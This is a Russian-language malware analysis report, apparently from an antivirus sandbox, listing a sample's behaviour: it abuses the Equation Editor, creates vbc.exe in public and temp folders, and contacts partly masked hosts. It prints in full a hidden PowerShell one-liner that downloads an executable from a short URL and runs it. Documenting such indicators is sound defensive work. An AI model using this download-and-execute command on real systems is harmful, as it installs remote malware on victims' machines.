Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '' (загружен из сети Интернет)
Создает и запускает на исполнение (эксплоит)
- 'C:\users\public\vbc.exe'
Загружает
- https://ggle.io/4fj4 as %temp%\\vbc.exe
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\vbc.exe
Сетевая активность
Подключается к
- '13.##8.159.178':80
- 'gg#e.io':443
TCP
Запросы HTTP GET
- http://13.##8.159.178/hkcmd/kernel.exe
Другие
- 'gg#e.io':443
UDP
- DNS ASK gg#e.io
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('https://ggle.io/4Fj4', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('https://ggle.io/4Fj4', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\\vbc.exe'
